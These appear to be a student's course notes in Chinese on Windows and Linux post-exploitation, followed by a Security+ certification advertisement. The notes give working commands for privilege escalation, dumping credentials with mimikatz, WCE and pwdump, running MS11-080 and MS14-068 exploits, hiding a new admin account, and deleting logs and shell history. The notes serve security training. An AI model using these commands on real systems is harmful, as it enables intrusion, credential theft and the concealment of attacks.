Windows

user

Administrator

System

Linux

User

Root

windows提权

将admin提权为system

net user命令  查看账户

Guest 用户,权限很小

HelpAssistant 用户,远程协助账号

Windows system账号

系统设置管理功能

SysInternal Suite工具

  

放到/WINDOWS/system32  目录下就可在cmd中使用

psexec -i -s -d taskmgr   套件中的工具,-i 使用交互模式,-s 提升为system执行程序

windos internal书

at命令提权(xp,2003)

at 19:39 /interactive cmd   指定时间执行cmd,获得system权限,再启动其他进程都会以system账户运行,taskmgr命令打开任务管理器,先把explorer进程(桌面进程)kill,再以system权限打开

sc命令提权

sc Create syscmd binPath= "cmd /K start" type= own type= interact  重新启动命令行窗口,交互式,创建了系统服务syscmd

sc start syscmd  启动服务(系统服务默认以system权限启动,得到system权限)

注入进程提权

隐蔽痕迹

pinjector.exe

pinjector -p <PID> <cmd> <port> <inject into PID>  注入进程同时监听端口

抓包嗅探

Windows

Wireshark

Omnipeek

commview

Sniffpass   基于抓包的嗅探密码工具

Linux

Tcpdump

Wireshark

Dsniff    ftp的明文传输协议可以直接抓到密码

本地缓存密码

浏览器缓存的密码

IE浏览器

Firefox

网络密码

无线密码

http://www.nirsoft.net

Dump SAM

Pwdump  

命令行工具

将操作系统保存的密码哈希值导出,xp系统默认保存在system32/SAM

/usr/share/windows-binaries/fgdump/

Pwdump.exe localhost    显示本地的账户和密码

WINDOWS身份认证过程

windos LOGON程序,用LMHash与NTHash将输入的密码hash计算与SAM数据库比对,远程登录时,先计算再传输给主机,hash逆向计算结果不唯一,传输用NTLM协议

WCE(WINDOWS CREDENTIAL EDITOR)

Windows身份验证编辑器,从内存中读信息

/usr/share/wce/

需要管理员权限

wce-universal.exe -l / -lv  显示已经登陆的账号/显示详细信息

wce-universal.exe -d      指定LUID删除登录

wce-universal.exe -e      指定刷新时间

wce-universal.exe -r      每隔5秒刷新登录信息

wce-universal.exe -g      计算指定字符串的hash值

wce-universal.exe -w      显示内存中存放的明文密码!!

wce-universal.exe -i <LUID> -s <另一个账户信息>     指定LUID,将账户信息修改为指定

LM /NT hash

从内存读取LM / NTLM hash

Digest Authentication Package

NTLM Security Package

Kerberos Security Package

防止WCE***:

注册表位置:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

kerberos msv1_0

schannel

wdigest 用于本机登录,将此项删除,操作系统变成了单用户状态

tspkg  用于远程登录

pku2u

fgdump工具

mimikatz工具

::  显示帮助

privilege::debug    提升权限

sekurlsa::logonPasswords   显示账户的详细信息

sekurlsa模块:

process模块:

lsadump模块:

ts::multirdp  允许多用户同时登录

event模块,clear清除日志,drop不再产生新日志

misc模块:

利用漏洞提权

Ms11-080  漏洞编号,11年的80个

Kb2592799   漏洞补丁

将python脚本编译为exe文件,可在目标机器直接运行

Pyinstaller  

将脚本转换为exe

将解压文件放到python目录下,将脚本放到pyinstaller目录下

https://pypi.python.org/pypi/PyInstaller/2.1

python pyinstaller --onefile ms11-080.py

Pywin32

http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/

net localgroup administrators a /add

M S11-046

DoS

域服务器:

必须是windos server操作系统

ip地址必须为静态ip,网关192.168.1.1,DNS服务器ip地址就是自己的ip地址

管理员账户在升级成域后自动变成域管理员

运行dcpromo,会开始Active Directory向导,给域起DNS全名aa.com

NetBIOS名称默认aa,活动目录数据库不要和系统盘放一起,设置为DNS服务器

MCSE认证,MCST认证

要连接域的机器的DNS服务器设置为域控的ip地址

域用户密码必须符合密码复杂度要求

Ms14-068

https://github.com/bidord/pykek

ms14-068.py -u user@lab.com -s userSID -d dc.lab.com

拷贝 TGT_user1@lab.com.ccache 到windows系统

本地管理员登陆

mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exi

 

Ubuntu11.10 (官方停止更新更新源)

http://old-releases.ubuntu.com/releases/11.10/

gcc(在安装光盘中集成了常用软件包,可插入光盘安装)

sudo mount /dev/cdrom /media/cdrom   将光盘挂载

sudo apt-cdrom add && sudo apt-get install gcc    将光盘挂载到更新源里并安装软件

gcc 18411.c -o exp

CVE-2012-0056

/proc/pid/mem    启动过程中生成的临时目录

kernels >=2.6.39

利用代码:18411.c

远程拷贝:scp 文件目录

利用配置不当提权

与漏洞提权相比 更常用的方法

企业环境

补丁更新的全部已经安装

输入变量过滤之外更值得研发关注的安全隐患

以system权限启动   系统服务以system权限启动

NTFS权限允许users修改删除

icacls程序

查看NTFS权限

icacls c:\windows\*.exe /save txt /T   查看所有程序权限列表,保存成文件

i586-mingw32msvc-gcc -o admin.exe admin.c   编译成windows环境下的可执行程序   

Find

 linux检查文件权限:当前用户用户组所有用户

find / -perm 777 -exec ls -l {} \;    查找全权限的程序,777(全权限)

需要收集的信息:

Linux

/etc/resolv.conf     DNS配置

/etc/passwd        所有用户都可以read

/etc/shadow 用户账号密码,只有root和shadow用户可以读

whoami and who –a

ifconfig -a,

iptables -L -n,   查看防火墙设置

netstat –nr  网关和路由设置

uname –a,   内核版本

ps aux     进程列表

dpkg -l | head    软件包列表

Windows

ipconfig /all ,

ipconfig /displaydns   dns缓存

netstat -bnao , netstat –r 查看路由 

net view , net view /domain

net user /domain, net user %username% /domain

net accounts, net share  查看分享

net localgroup administrators username /add   添加到管理员组

net group "Domain Controllers" /domain     查看主机账号

net share name$=C:\ /unlimited   将c盘不设限制

net user username /active:yes /domain将域环境下被锁定的账户激活

 

WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

windows下的管理框架

wmic nicconfig get ipaddress,macaddress读取ip和mac地址

wmic computersystem get username查看登录账号

wmic netlogin get name,lastlogon查看登录记录

wmic process get caption, executablepath,commandline查看进程

wmic process where name=“calc.exe" call terminate结束进程

wmic os get name,servicepackmajorversion 提取操作系统版本

wmic product get name,version查看软件

wmic product where name=“name” call uninstall /nointeractive   卸载

wmic share get /ALL看共享文件夹

wmic  /node:主机名  path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“  开启远程桌面

wmic nteventlog get path,filename, writeable    查看系统日志文件目录

收集敏感数据

商业信息

系统信息

Linux

/etc配置文件目录

/usr/local/etc配置文件

/etc/passwd ;/etc/shadow

.ssh   远程连接的密钥

.gnupg 公私钥

The e-mail and data files

业务数据库 ;身份认证服务器数据库

/tm

windows

SAM 数据库 ; 注册表文件

%SYSTEMROOT%\repair\SAM     SAM副本

%SYSTEMROOT%\System32\config\RegBack\SAM

业务数据库 ; 身份认证数据库

临时文件目录

UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

隐藏痕迹

禁止在登陆界面显示新建账号

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0

del %WINDIR%\*.log /a/s/q/f

History

history -c   清除执行命令历史

日志

auth.log / secure btmp/wtmp

lastlog / faillog

其他日志和 HIDS 等

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?

      牛妹先给大家介绍一下Security+

        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。